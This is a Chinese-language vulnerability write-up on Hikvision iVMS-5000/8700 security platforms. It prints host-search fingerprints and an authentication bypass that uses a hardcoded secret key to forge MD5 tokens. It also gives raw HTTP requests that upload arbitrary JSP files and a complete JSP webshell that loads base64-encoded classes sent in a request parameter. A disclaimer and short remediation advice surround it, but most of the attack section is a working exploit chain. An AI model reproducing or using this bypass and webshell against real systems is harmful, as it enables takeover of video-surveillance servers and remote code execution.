声明
本篇文章仅用于漏洞复现与技术研究,请勿利用文章内的相关技术从事非法测试,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
一、产品简介
海康威视 iVMS 集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、连网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。
二、漏洞概述
海康威视 iVMS系统存在在野利用 0day漏洞,攻击者可通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行。
三、影响范围
- 海康威视综合安防系统 iVMS-5000
- 海康威视综合安防系统 iVMS-8700
四、漏洞验证
鹰图指纹: web.body="/views/home/file/installPackage.rar"
hunter指纹: web.icon=="3670cbb1369332b296ce44a94b7dd685"
漏洞url: /eps/api/resourceOperations/upload
测试脚本: https://github.com/sccmdaveli/hikvision-poc
脚本验证
手工测试
bp抓起首页包,尝试访问接口 (这里出现token需要进行鉴权)
数据包如下:
POST /eps/api/resourceOperations/upload HTTP/1.1
Host: X.X.X.X
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ISMS_8700_Sessionname=60F93668C907B8C1E8E7A1C16A382723
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
service=http%3A%2F%2FX.X.X.X%2Fhome%2Findex.action
构造token绕过认证 (内部机制:如果token值与请求url+secretkey的MD5值相同就可以绕过认证)
secretkey是代码里写死的 (默认值:secretKeyIbuilding)
token值需要进行MD5加密 (32位大写)
组合:token=MD5 (url+" secretKeyIbuilding")
MD5加密网址:https://www.sojson.com/encrypt_md5.html
http://X.X.X.X/eps/api/resourceOperations/uploadsecretKeyIbuilding
MD5 32位大写: ************************
再次验证:
数据包:
POST /eps/api/resourceOperations/upload?token=9A*************************A0 HTTP/1.1
Host: X.X.X.X
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ISMS_8700_Sessionname=1ED2B975E9CB9B73D71CD033B92F5AB5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
service=http%3A%2F%2FX.X.X.X%3AXXXX%2Fhome%2Findex.action
可以看出,已经成功绕过!!!
构造文件上传Payload
POST /eps/api/resourceOperations/upload?token=9A******************************A0 HTTP/1.1
Host: X.X.X.X
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ISMS_8700_Sessionname=1ED2B975E9CB9B73D71CD033B92F5AB5
Connection: close
Content-Type: multipart/form-data;boundary=f7d1250b2d43db9324c19e1073573ce6
Content-Length: 179
--f7d1250b2d43db9324c19e1073573ce6
Content-Disposition: form-data; name="fileUploader"; filename="1.jsp"
Content-Type: image/jpeg
test
--f7d1250b2d43db9324c19e1073573ce6—
Web访问:http://X.X.X.X/eps/upload/resourceUuid值.jsp
五、漏洞利用
Tips:谨慎操作
以下为JSP木马
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
该漏洞利用方式极简,危害极高,建议及时修复!!!
六、修复建议
关闭互联网暴露面访问的权限,文件上传模块做好权限强认证
建议各单位对应用进行排查,以免造成其他影响。
